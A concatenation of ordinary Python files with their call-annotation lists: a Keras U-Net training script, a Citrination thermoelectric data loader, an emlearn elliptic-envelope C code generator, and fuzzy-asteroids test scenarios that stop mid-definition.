{}), '(wind_x)\n', (5849, 5857), True, 'import numpy as np\n'), ((6627, 6656), 'numpy.linspace', 'np.linspace', (['(-180)', '(180)', 'nbins'], {}), '(-180, 180, nbins)\n', (6638, 6656), True, 'import numpy as np\n'), ((4167, 4182), 'scipy.special.i0', 'i0', (['light_kappa'], {}), '(light_kappa)\n', (4169, 4182), False, 'from scipy.special import i0\n'), ((4315, 4329), 'scipy.special.i0', 'i0', (['wind_kappa'], {}), '(wind_kappa)\n', (4317, 4329), False, 'from scipy.special import i0\n'), ((5429, 5444), 'scipy.special.i0', 'i0', (['light_kappa'], {}), '(light_kappa)\n', (5431, 5444), False, 'from scipy.special import i0\n'), ((5577, 5591), 'scipy.special.i0', 'i0', (['wind_kappa'], {}), '(wind_kappa)\n', (5579, 5591), False, 'from scipy.special import i0\n'), ((6426, 6445), 'numpy.degrees', 'np.degrees', (['changes'], {}), '(changes)\n', (6436, 6445), True, 'import numpy as np\n'), ((6447, 6480), 'numpy.linspace', 'np.linspace', (['(-180)', '(180)', '(nbins + 1)'], {}), '(-180, 180, nbins + 1)\n', (6458, 6480), True, 'import numpy as np\n'), ((6872, 6881), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (6879, 6881), True, 'import matplotlib.pyplot as plt\n'), ((3439, 3456), 'numpy.degrees', 'np.degrees', (['avg_t'], {}), '(avg_t)\n', (3449, 3456), True, 'import numpy as np\n'), ((4130, 4156), 'numpy.cos', 'np.cos', (['(light_x - light_mu)'], {}), '(light_x - light_mu)\n', (4136, 4156), True, 'import numpy as np\n'), ((4280, 4304), 'numpy.cos', 'np.cos', (['(wind_x - wind_mu)'], {}), '(wind_x - wind_mu)\n', (4286, 4304), True, 'import numpy as np\n'), ((5392, 5418), 'numpy.cos', 'np.cos', (['(light_x - light_mu)'], {}), '(light_x - light_mu)\n', (5398, 5418), True, 'import numpy as np\n'), ((5542, 5566), 'numpy.cos', 'np.cos', (['(wind_x - wind_mu)'], {}), '(wind_x - wind_mu)\n', (5548, 5566), True, 'import numpy as np\n')]
|
import os
"""
# If you have multi-gpu, designate the number of GPU to use.
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "6"
"""
import argparse
import logging
from tqdm import tqdm # progress bar
import numpy as np
import matplotlib.pyplot as plt
from keras import optimizers
from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
import segmentation_models as sm
from segmentation_models.utils import set_trainable
from dataset import DataGenerator
def train_model(model, train_gen, valid_gen, epochs, batch_size, save_cp=True):
total_batch_count = 0
train_batch_num = len(train_gen)
train_num = train_batch_num * batch_size
#train_gen_out = iter_sequence_infinite(train_gen)
valid_batch_num = len(valid_gen)
valid_num = valid_batch_num * batch_size
#valid_gen_out = iter_sequence_infinite(valid_gen)
for epoch in range(epochs): # interation as many epochs
set_trainable(model)
epoch_loss = 0 # loss in this epoch
epoch_iou = 0
count = 0
with tqdm(total=train_num, desc=f'Epoch {epoch + 1}/{epochs}', position=0, leave=True, unit='img') as pbar: # make progress bar
for batch in train_gen:
#batch = next(train_gen_out)
imgs = batch[0]
true_masks = batch[1]
loss, iou = model.train_on_batch(imgs, true_masks) # value of loss of this batch
epoch_loss += loss
epoch_iou += iou
pbar.set_postfix(**{'Batch loss': loss, 'Batch IoU': iou}) # floating the loss at the post in the pbar
pbar.update(imgs.shape[0]) # update progress
count += 1
total_batch_count += 1
print( "Epoch : loss: {}, IoU : {}".format(epoch_loss/count, epoch_iou/count))
# Do validation
validation_model(model, valid_gen, valid_num)
train_gen.on_epoch_end()
valid_gen.on_epoch_end()
if save_cp:
try:
if not os.path.isdir(checkpoint_dir):
os.mkdir(checkpoint_dir)
logging.info('Created checkpoint directory')
else:
pass
except OSError:
pass
model.save_weights(os.path.join(checkpoint_dir , f'CP_epoch{epoch + 1}.h5'))
logging.info(f'Checkpoint {epoch + 1} saved !')
def validation_model(model, valid_gen, valid_num):
epoch_loss = 0 # loss in this epoch
epoch_iou = 0
count = 0
with tqdm(total=valid_num, desc='Validation round', position=0, leave=True, unit='img') as pbar: # make progress bar
for batch in valid_gen:
#batch = next(valid_gen_out)
imgs = batch[0]
true_masks = batch[1]
loss, iou = model.test_on_batch(imgs, true_masks) # value of loss of this batch
epoch_loss += loss
epoch_iou += iou
pbar.set_postfix(**{'Batch, loss': loss, 'Batch IoU': iou}) # floating the loss at the post in the pbar
pbar.update(imgs.shape[0]) # update progress
count += 1
print("Validation loss: {}, IoU: {}".format(epoch_loss / count, epoch_iou / count))
pred_mask = model.predict(np.expand_dims(imgs[0],0))
plt.subplot(131)
plt.imshow(imgs[0])
plt.subplot(132)
plt.imshow(true_masks[0].squeeze(), cmap="gray")
plt.subplot(133)
plt.imshow(pred_mask.squeeze(), cmap="gray")
plt.show()
print()
def get_args():
parser = argparse.ArgumentParser(description='Train the UNet on images and target masks',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-e', '--epochs', metavar='E', type=int, default=100,
help='Number of epochs', dest='epochs')
parser.add_argument('-b', '--batch_size', metavar='B', type=int, nargs='?', default=4,
help='Batch size', dest='batch_size')
parser.add_argument('-l', '--learning-rate', metavar='LR', type=float, nargs='?', default=1e-4,
help='Learning rate', dest='lr')
parser.add_argument('-bb', '--backbone', default='resnet50', metavar='FILE',
help="backcone name")
parser.add_argument('-w', '--weight', dest='load', type=str, default=False,
help='Load model from a .h5 file')
parser.add_argument('-s', '--resizing', dest='resizing', type=int, default=384,
help='Downscaling factor of the images')
parser.add_argument('-v', '--validation', dest='val', type=float, default=20.0,
help='Percent of the data that is used as validation (0-100)')
return parser.parse_args()
if __name__ == '__main__':
img_dir = '../data/train/imgs/' # ./data/train/imgs/CVC_Original/'
mask_dir = '../data/train/masks/' # ./data/train/masks/CVC_Ground Truth/'
checkpoint_dir = './checkpoints'
args = get_args()
# train path
train_ids = os.listdir(img_dir)
# Validation Data Size
n_val = int(len(train_ids) * args.val/100) # size of validation set
valid_ids = train_ids[:n_val] # list of image ids used for validation of result 0 to 9
train_ids = train_ids[n_val:] # list of image ids used for training dataset
# print(valid_ids, "\n\n")
print("training_size: ", len(train_ids), "validation_size: ", len(valid_ids))
train_gen = DataGenerator(train_ids, img_dir, mask_dir, img_size=args.resizing, batch_size=args.batch_size)
valid_gen = DataGenerator(valid_ids, img_dir, mask_dir, img_size=args.resizing, batch_size=args.batch_size)
print("total training batches: ", len(train_gen))
print("total validaton batches: ", len(valid_gen))
train_steps = len(train_ids) // args.batch_size
valid_steps = len(valid_ids) // args.batch_size
# define model
model = sm.Unet(args.backbone, encoder_weights='imagenet')
optimizer = optimizers.Adam(lr=args.lr, decay=1e-4)
model.compile(
optimizer=optimizer,
# "Adam",
loss=sm.losses.bce_dice_loss, # sm.losses.bce_jaccard_loss, # sm.losses.binary_crossentropy,
metrics=[sm.metrics.iou_score],
)
#model.summary()
callbacks = [
EarlyStopping(patience=6, verbose=1),
ReduceLROnPlateau(factor=0.1, patience=3, min_lr=1e-7, verbose=1),
ModelCheckpoint('./weights.Epoch{epoch:02d}-Loss{loss:.3f}-VIou{val_iou_score:.3f}.h5', verbose=1,
monitor='val_accuracy', save_best_only=True, save_weights_only=True)
]
train_model(model=model, train_gen=train_gen,
valid_gen=valid_gen, epochs=args.epochs, batch_size=args.batch_size)
|
[
"matplotlib.pyplot.imshow",
"keras.optimizers.Adam",
"os.listdir",
"segmentation_models.utils.set_trainable",
"argparse.ArgumentParser",
"keras.callbacks.ModelCheckpoint",
"keras.callbacks.ReduceLROnPlateau",
"tqdm.tqdm",
"os.path.join",
"logging.info",
"os.path.isdir",
"dataset.DataGenerator",
"os.mkdir",
"numpy.expand_dims",
"keras.callbacks.EarlyStopping",
"matplotlib.pyplot.subplot",
"segmentation_models.Unet",
"matplotlib.pyplot.show"
] |
[((3351, 3367), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(131)'], {}), '(131)\n', (3362, 3367), True, 'import matplotlib.pyplot as plt\n'), ((3372, 3391), 'matplotlib.pyplot.imshow', 'plt.imshow', (['imgs[0]'], {}), '(imgs[0])\n', (3382, 3391), True, 'import matplotlib.pyplot as plt\n'), ((3396, 3412), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(132)'], {}), '(132)\n', (3407, 3412), True, 'import matplotlib.pyplot as plt\n'), ((3470, 3486), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(133)'], {}), '(133)\n', (3481, 3486), True, 'import matplotlib.pyplot as plt\n'), ((3540, 3550), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3548, 3550), True, 'import matplotlib.pyplot as plt\n'), ((3594, 3740), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train the UNet on images and target masks"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description=\n 'Train the UNet on images and target masks', formatter_class=argparse.\n ArgumentDefaultsHelpFormatter)\n", (3617, 3740), False, 'import argparse\n'), ((5111, 5130), 'os.listdir', 'os.listdir', (['img_dir'], {}), '(img_dir)\n', (5121, 5130), False, 'import os\n'), ((5536, 5635), 'dataset.DataGenerator', 'DataGenerator', (['train_ids', 'img_dir', 'mask_dir'], {'img_size': 'args.resizing', 'batch_size': 'args.batch_size'}), '(train_ids, img_dir, mask_dir, img_size=args.resizing,\n batch_size=args.batch_size)\n', (5549, 5635), False, 'from dataset import DataGenerator\n'), ((5648, 5747), 'dataset.DataGenerator', 'DataGenerator', (['valid_ids', 'img_dir', 'mask_dir'], {'img_size': 'args.resizing', 'batch_size': 'args.batch_size'}), '(valid_ids, img_dir, mask_dir, img_size=args.resizing,\n batch_size=args.batch_size)\n', (5661, 5747), False, 'from dataset import DataGenerator\n'), ((5990, 6040), 'segmentation_models.Unet', 'sm.Unet', (['args.backbone'], {'encoder_weights': '"""imagenet"""'}), "(args.backbone, encoder_weights='imagenet')\n", (5997, 6040), True, 'import segmentation_models as sm\n'), ((6058, 6099), 'keras.optimizers.Adam', 'optimizers.Adam', ([], {'lr': 'args.lr', 'decay': '(0.0001)'}), '(lr=args.lr, decay=0.0001)\n', (6073, 6099), False, 'from keras import optimizers\n'), ((964, 984), 'segmentation_models.utils.set_trainable', 'set_trainable', (['model'], {}), '(model)\n', (977, 984), False, 'from segmentation_models.utils import set_trainable\n'), ((2599, 2686), 'tqdm.tqdm', 'tqdm', ([], {'total': 'valid_num', 'desc': '"""Validation round"""', 'position': '(0)', 'leave': '(True)', 'unit': '"""img"""'}), "(total=valid_num, desc='Validation round', position=0, leave=True, unit\n ='img')\n", (2603, 2686), False, 'from tqdm import tqdm\n'), ((3320, 3346), 'numpy.expand_dims', 'np.expand_dims', (['imgs[0]', '(0)'], {}), '(imgs[0], 0)\n', (3334, 3346), True, 'import numpy as np\n'), ((6367, 6403), 'keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'patience': '(6)', 'verbose': '(1)'}), '(patience=6, verbose=1)\n', (6380, 6403), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n'), ((6413, 6479), 'keras.callbacks.ReduceLROnPlateau', 'ReduceLROnPlateau', ([], {'factor': '(0.1)', 'patience': '(3)', 'min_lr': '(1e-07)', 'verbose': '(1)'}), '(factor=0.1, patience=3, min_lr=1e-07, verbose=1)\n', (6430, 6479), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n'), ((6488, 6668), 'keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', (['"""./weights.Epoch{epoch:02d}-Loss{loss:.3f}-VIou{val_iou_score:.3f}.h5"""'], {'verbose': '(1)', 'monitor': '"""val_accuracy"""', 'save_best_only': '(True)', 'save_weights_only': '(True)'}), "(\n './weights.Epoch{epoch:02d}-Loss{loss:.3f}-VIou{val_iou_score:.3f}.h5',\n verbose=1, monitor='val_accuracy', save_best_only=True,\n save_weights_only=True)\n", (6503, 6668), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n'), ((1092, 1190), 'tqdm.tqdm', 'tqdm', ([], {'total': 'train_num', 'desc': 'f"""Epoch {epoch + 1}/{epochs}"""', 'position': '(0)', 'leave': '(True)', 'unit': '"""img"""'}), "(total=train_num, desc=f'Epoch {epoch + 1}/{epochs}', position=0, leave\n =True, unit='img')\n", (1096, 1190), False, 'from tqdm import tqdm\n'), ((2416, 2463), 'logging.info', 'logging.info', (['f"""Checkpoint {epoch + 1} saved !"""'], {}), "(f'Checkpoint {epoch + 1} saved !')\n", (2428, 2463), False, 'import logging\n'), ((2346, 2401), 'os.path.join', 'os.path.join', (['checkpoint_dir', 'f"""CP_epoch{epoch + 1}.h5"""'], {}), "(checkpoint_dir, f'CP_epoch{epoch + 1}.h5')\n", (2358, 2401), False, 'import os\n'), ((2078, 2107), 'os.path.isdir', 'os.path.isdir', (['checkpoint_dir'], {}), '(checkpoint_dir)\n', (2091, 2107), False, 'import os\n'), ((2129, 2153), 'os.mkdir', 'os.mkdir', (['checkpoint_dir'], {}), '(checkpoint_dir)\n', (2137, 2153), False, 'import os\n'), ((2174, 2218), 'logging.info', 'logging.info', (['"""Created checkpoint directory"""'], {}), "('Created checkpoint directory')\n", (2186, 2218), False, 'import logging\n')]
|
## Data Loader: TE-CCA zT Dataset
# <NAME> (<EMAIL>) 2021-03-12
#
from citrination_client import CitrinationClient, PifSystemReturningQuery
from citrination_client import DataQuery, DatasetQuery, Filter
from matminer.featurizers.base import MultipleFeaturizer
from matminer.featurizers import composition as cf
from pymatgen import Composition
from sl_utils import pifs2df, setResDir
import pandas as pd
import numpy as np
import os
import time
prefix = "zT"
file_responses = prefix + "_responses.csv"
file_features = prefix + "_features.csv"
## Helper functions
def get_compostion(c):
"""Attempt to parse composition, return None if failed"""
try:
return Composition(c)
except:
return None
def load_data_zT():
results_dir = setResDir()
## Metadata
keys_response = [
'Seebeck coefficient; squared',
'Electrical resistivity',
'Thermal conductivity'
]
sign = np.array([
+1, # Seebeck
-1, # Electric resistivity
-1 # Thermal conductivity
])
## Load data, if possible
# --------------------------------------------------
try:
df_X_all = pd.read_csv(results_dir + file_features)
X_all = df_X_all.drop(df_X_all.columns[0], axis = 1).values
df_Y_all = pd.read_csv(results_dir + file_responses)
Y_all = df_Y_all.drop(df_Y_all.columns[0], axis = 1).values
print("Cached data loaded.")
except FileNotFoundError:
## Data Import
# --------------------------------------------------
# Initialize client
print("Accessing data from Citrination...")
site = 'https://citrination.com' # Citrination
client = CitrinationClient(api_key=os.environ['CITRINATION_API_KEY'], site=site)
search_client = client.search
# Aluminum dataset
dataset_id = 178480 # ucsb_te_roomtemp_seebeck
system_query = PifSystemReturningQuery(
size=1000,
query=DataQuery(
dataset=DatasetQuery(id=Filter(equal=str(dataset_id)))
)
)
query_result = search_client.pif_search(system_query)
print(" Found {} PIFs in dataset {}.".format(
query_result.total_num_hits,
dataset_id
))
## Wrangle
# --------------------------------------------------
pifs = [x.system for x in query_result.hits]
# Utility function will tabularize PIFs
df_response = pifs2df(pifs)
# Down-select columns to play well with to_numeric
df_response = df_response[
['Seebeck coefficient', 'Electrical resistivity', 'Thermal conductivity']
]
df_response = df_response.apply(pd.to_numeric)
# Parse chemical compositions
formulas = [pif.chemical_formula for pif in pifs]
df_comp = pd.DataFrame(
columns = ['chemical_formula'],
data = formulas
)
# Join
df_data = pd.concat([df_comp, df_response], axis = 1)
print(" Accessed data.")
# Featurize
print("Featurizing data...")
df_data['composition'] = df_data['chemical_formula'].apply(get_compostion)
f = MultipleFeaturizer([
cf.Stoichiometry(),
cf.ElementProperty.from_preset("magpie"),
cf.ValenceOrbital(props=['avg']),
cf.IonProperty(fast=True)
])
X = np.array(f.featurize_many(df_data['composition']))
# Find valid response values
keys_original = [
'Seebeck coefficient',
'Electrical resistivity',
'Thermal conductivity'
]
index_valid_response = {
key: df_data[key].dropna().index.values for key in keys_original
}
index_valid_all = df_data[keys_original].dropna().index.values
X_all = X[index_valid_all, :]
Y_all = df_data[keys_original].iloc[index_valid_all].values
# Manipulate columns for proper objective values
Y_all[:, 0] = Y_all[:, 0] ** 2 # Squared seebeck
print(" Data prepared; {0:} valid observations.".format(X_all.shape[0]))
# Cache data
pd.DataFrame(data = X_all).to_csv(results_dir + file_features)
pd.DataFrame(
data = Y_all,
columns = keys_response
).to_csv(results_dir + file_responses)
print("Data cached in results directory.")
return X_all, Y_all, sign, keys_response, prefix
if __name__ == "__main__":
X_all, Y_all, sign, keys_response, prefix = load_data_zT()
|
[
"matminer.featurizers.composition.ValenceOrbital",
"pandas.read_csv",
"citrination_client.CitrinationClient",
"sl_utils.setResDir",
"numpy.array",
"pandas.DataFrame",
"matminer.featurizers.composition.IonProperty",
"matminer.featurizers.composition.Stoichiometry",
"pymatgen.Composition",
"pandas.concat",
"matminer.featurizers.composition.ElementProperty.from_preset",
"sl_utils.pifs2df"
] |
[((764, 775), 'sl_utils.setResDir', 'setResDir', ([], {}), '()\n', (773, 775), False, 'from sl_utils import pifs2df, setResDir\n'), ((940, 962), 'numpy.array', 'np.array', (['[+1, -1, -1]'], {}), '([+1, -1, -1])\n', (948, 962), True, 'import numpy as np\n'), ((678, 692), 'pymatgen.Composition', 'Composition', (['c'], {}), '(c)\n', (689, 692), False, 'from pymatgen import Composition\n'), ((1169, 1209), 'pandas.read_csv', 'pd.read_csv', (['(results_dir + file_features)'], {}), '(results_dir + file_features)\n', (1180, 1209), True, 'import pandas as pd\n'), ((1298, 1339), 'pandas.read_csv', 'pd.read_csv', (['(results_dir + file_responses)'], {}), '(results_dir + file_responses)\n', (1309, 1339), True, 'import pandas as pd\n'), ((1712, 1783), 'citrination_client.CitrinationClient', 'CitrinationClient', ([], {'api_key': "os.environ['CITRINATION_API_KEY']", 'site': 'site'}), "(api_key=os.environ['CITRINATION_API_KEY'], site=site)\n", (1729, 1783), False, 'from citrination_client import CitrinationClient, PifSystemReturningQuery\n'), ((2501, 2514), 'sl_utils.pifs2df', 'pifs2df', (['pifs'], {}), '(pifs)\n', (2508, 2514), False, 'from sl_utils import pifs2df, setResDir\n'), ((2879, 2936), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['chemical_formula']", 'data': 'formulas'}), "(columns=['chemical_formula'], data=formulas)\n", (2891, 2936), True, 'import pandas as pd\n'), ((3012, 3053), 'pandas.concat', 'pd.concat', (['[df_comp, df_response]'], {'axis': '(1)'}), '([df_comp, df_response], axis=1)\n', (3021, 3053), True, 'import pandas as pd\n'), ((3280, 3298), 'matminer.featurizers.composition.Stoichiometry', 'cf.Stoichiometry', ([], {}), '()\n', (3296, 3298), True, 'from matminer.featurizers import composition as cf\n'), ((3312, 3352), 'matminer.featurizers.composition.ElementProperty.from_preset', 'cf.ElementProperty.from_preset', (['"""magpie"""'], {}), "('magpie')\n", (3342, 3352), True, 'from matminer.featurizers import composition as cf\n'), ((3366, 3398), 'matminer.featurizers.composition.ValenceOrbital', 'cf.ValenceOrbital', ([], {'props': "['avg']"}), "(props=['avg'])\n", (3383, 3398), True, 'from matminer.featurizers import composition as cf\n'), ((3412, 3437), 'matminer.featurizers.composition.IonProperty', 'cf.IonProperty', ([], {'fast': '(True)'}), '(fast=True)\n', (3426, 3437), True, 'from matminer.featurizers import composition as cf\n'), ((4252, 4276), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'X_all'}), '(data=X_all)\n', (4264, 4276), True, 'import pandas as pd\n'), ((4323, 4370), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'Y_all', 'columns': 'keys_response'}), '(data=Y_all, columns=keys_response)\n', (4335, 4370), True, 'import pandas as pd\n')]
|
import os.path
import os
import numpy
from . import common, cgen
"""
References
https://github.com/scikit-learn/scikit-learn/blob/15a949460dbf19e5e196b8ef48f9712b72a3b3c3/sklearn/covariance/_empirical_covariance.py#L297
https://github.com/scikit-learn/scikit-learn/blob/15a949460dbf19e5e196b8ef48f9712b72a3b3c3/sklearn/covariance/_elliptic_envelope.py#L149
"""
from sklearn.mixture._gaussian_mixture import _compute_log_det_cholesky
from sklearn.utils.extmath import row_norms
np = numpy
def squared_mahalanobis_distance(x1, x2, precision):
"""
@precision is the inverted covariance matrix
computes (x1 - x2).T * VI * (x1 - x2)
where VI is the precision matrix, the inverse of the covariance matrix
Loosely based on the scikit-learn implementation,
https://github.com/scikit-learn/scikit-learn/blob/main/sklearn/neighbors/_dist_metrics.pyx
"""
distance = 0.0
size = x1.shape[0]
temp = numpy.zeros(shape=size)
assert x1.shape == x2.shape
assert precision.shape[0] == precision.shape[1]
assert size == precision.shape[0]
for i in range(size):
accumulate = 0
for j in range(size):
accumulate += precision[i, j] * (x1[j] - x2[j])
distance += accumulate * (x1[i] - x2[i])
return distance
def generate_code(means, precision, offset, name='my_elliptic', modifiers='static const'):
n_features = means.shape[0]
decision_boundary = offset # FIXME, check
classifier_name = f'{name}_classifier'
means_name = f'{name}_means'
precisions_name = f'{name}_precisions'
predict_function_name = f'{name}_predict'
includes = '''
// This code is generated by emlearn
#include <eml_distance.h>
'''
pre = '\n\n'.join([
includes,
cgen.array_declare(means_name, n_features, modifiers=modifiers, values=means),
cgen.array_declare(precisions_name, n_features*n_features,
modifiers=modifiers,
values=precision.flatten(order='C'),
),
])
main = f'''
#include <stdio.h>
// Data definitions
{modifiers} EmlEllipticEnvelope {classifier_name} = {{
{n_features},
{decision_boundary},
{means_name},
{precisions_name}
}};
// Prediction function
float {predict_function_name}(const float *features, int n_features) {{
float dist = 0.0;
const int class = eml_elliptic_envelope_predict(&{classifier_name},
features, n_features, &dist);
return dist;
}}
'''
code = pre + main
return code
class Wrapper:
def __init__(self, estimator, classifier='inline', dtype='float'):
self.dtype = dtype
precision = estimator.get_precision()
self._means = estimator.location_.copy()
self._precision = precision
self._offset = estimator.offset_
if classifier == 'inline':
name = 'my_inline_elliptic'
func = '{}_predict(values, length)'.format(name)
code = self.save(name=name)
self.classifier_ = common.CompiledClassifier(code, name=name, call=func, out_dtype='float')
else:
raise ValueError("Unsupported classifier method '{}'".format(classifier))
def mahalanobis(self, X):
def dist(x):
return squared_mahalanobis_distance(x, self._means, precision=self._precision)
p = numpy.array([ dist(x) for x in X ])
predictions = self.classifier_.predict(X)
return predictions
def predict(self, X):
def predict_one(d):
dist = -d
dd = dist - self._offset
is_inlier = 1 if dd > 0 else -1
return is_inlier
distances = self.mahalanobis(X)
return numpy.array([predict_one(d) for d in distances])
def save(self, name=None, file=None):
if name is None:
if file is None:
raise ValueError('Either name or file must be provided')
else:
name = os.path.splitext(os.path.basename(file))[0]
code = generate_code(self._means, self._precision, self._offset, name=name)
if file:
with open(file, 'w') as f:
f.write(code)
return code
|
[
"numpy.zeros",
"os.path.basename"
] |
[((942, 965), 'numpy.zeros', 'numpy.zeros', ([], {'shape': 'size'}), '(shape=size)\n', (953, 965), False, 'import numpy\n'), ((4073, 4095), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (4089, 4095), False, 'import os\n')]
|
from fuzzy_asteroids.util import Scenario
import numpy as np
# "Simple" Scenarios --------------------------------------------------------------------------------------------------#
# Threat priority tests
threat_test_1 = Scenario(
name="threat_test_1",
asteroid_states=[{"position": (0, 300), "angle": -90.0, "speed": 40},
{"position": (700, 300), "angle": 0.0, "speed": 0},
],
ship_state={"position": (600, 300)},
seed=0
)
threat_test_2 = Scenario(
name="threat_test_2",
asteroid_states=[{"position": (800, 300), "angle": 90.0, "speed": 40},
{"position": (100, 300), "angle": 0.0, "speed": 0},
],
ship_state={"position": (200, 300)},
seed=0
)
threat_test_3 = Scenario(
name="threat_test_3",
asteroid_states=[{"position": (400, 0), "angle": 0.0, "speed": 40},
{"position": (400, 550), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 450)},
seed=0
)
threat_test_4 = Scenario(
name="threat_test_4",
asteroid_states=[{"position": (400, 600), "angle": 180.0, "speed": 40},
{"position": (400, 50), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 150)},
seed=0
)
# Accuracy tests
accuracy_test_1 = Scenario(
name="accuracy_test_1",
asteroid_states=[{"position": (400, 500), "angle": 90.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_2 = Scenario(
name="accuracy_test_2",
asteroid_states=[{"position": (400, 500), "angle": -90.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_3 = Scenario(
name="accuracy_test_3",
asteroid_states=[{"position": (100, 100), "angle": 0.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_4 = Scenario(
name="accuracy_test_4",
asteroid_states=[{"position": (700, 100), "angle": 0.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_5 = Scenario(
name="accuracy_test_5",
asteroid_states=[{"position": (100, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_6 = Scenario(
name="accuracy_test_6",
asteroid_states=[{"position": (700, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_7 = Scenario(
name="accuracy_test_7",
asteroid_states=[{"position": (400, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100), "angle": 90.0},
seed=0
)
accuracy_test_8 = Scenario(
name="accuracy_test_8",
asteroid_states=[{"position": (400, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100), "angle": -90.0},
seed=0
)
accuracy_test_9 = Scenario(
name="accuracy_test_9",
asteroid_states=[{"position": (100, 500), "angle": -135.0, "speed": 120, "size": 1},
],
ship_state={"position": (700, 100), "angle": -90.0},
seed=0
)
accuracy_test_10 = Scenario(
name="accuracy_test_10",
asteroid_states=[{"position": (700, 500), "angle": 135.0, "speed": 120, "size": 1},
],
ship_state={"position": (100, 100), "angle": 90.0},
seed=0
)
# "Easy" wall scenario with default ship state, starts on left and moves right
wall_left_easy = Scenario(
name="wall_left_easy",
asteroid_states=[{"position": (0, 100), "angle": -90.0, "speed": 60},
{"position": (0, 200), "angle": -90.0, "speed": 60},
{"position": (0, 300), "angle": -90.0, "speed": 60},
{"position": (0, 400), "angle": -90.0, "speed": 60},
{"position": (0, 500), "angle": -90.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# "Easy" wall scenario with default ship state, starts on right and moves left
wall_right_easy = Scenario(
name="wall_right_easy",
asteroid_states=[{"position": (800, 100), "angle": 90.0, "speed": 60},
{"position": (800, 200), "angle": 90.0, "speed": 60},
{"position": (800, 300), "angle": 90.0, "speed": 60},
{"position": (800, 400), "angle": 90.0, "speed": 60},
{"position": (800, 500), "angle": 90.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# "Easy" wall scenario with default ship state, starts at the top and moves downward
wall_top_easy = Scenario(
name="wall_top_easy",
asteroid_states=[{"position": (100, 600), "angle": 180.0, "speed": 60},
{"position": (200, 600), "angle": 180.0, "speed": 60},
{"position": (300, 600), "angle": 180.0, "speed": 60},
{"position": (400, 600), "angle": 180.0, "speed": 60},
{"position": (500, 600), "angle": 180.0, "speed": 60},
{"position": (600, 600), "angle": 180.0, "speed": 60},
{"position": (700, 600), "angle": 180.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# "Easy" wall scenario with default ship state, starts at the top and moves downward
wall_bottom_easy = Scenario(
name="wall_bottom_easy",
asteroid_states=[{"position": (100, 0), "angle": 0.0, "speed": 60},
{"position": (200, 0), "angle": 0.0, "speed": 60},
{"position": (300, 0), "angle": 0.0, "speed": 60},
{"position": (400, 0), "angle": 0.0, "speed": 60},
{"position": (500, 0), "angle": 0.0, "speed": 60},
{"position": (600, 0), "angle": 0.0, "speed": 60},
{"position": (700, 0), "angle": 0.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# Ring scenarios ------------------------------------------------------------------------------------------------------#
# Scenario where a ring of asteroids close in on the vehicle
# calculating initial states
R = 300
theta = np.linspace(0, 2 * np.pi, 17)[:-1]
ast_x = [R * np.cos(angle) + 400 for angle in theta]
ast_y = [R * np.sin(angle) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 30})
ring_closing = Scenario(
name="ring_closing",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring scenarios
# Static ring left
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
ast_x = [R * np.cos(angle + np.pi) + 400 for angle in theta]
ast_y = [R * np.sin(angle + np.pi) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_left = Scenario(
name="ring_static_left",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring right
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
ast_x = [R * np.cos(angle) + 400 for angle in theta]
ast_y = [R * np.sin(angle) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_right = Scenario(
name="ring_static_right",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring top
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
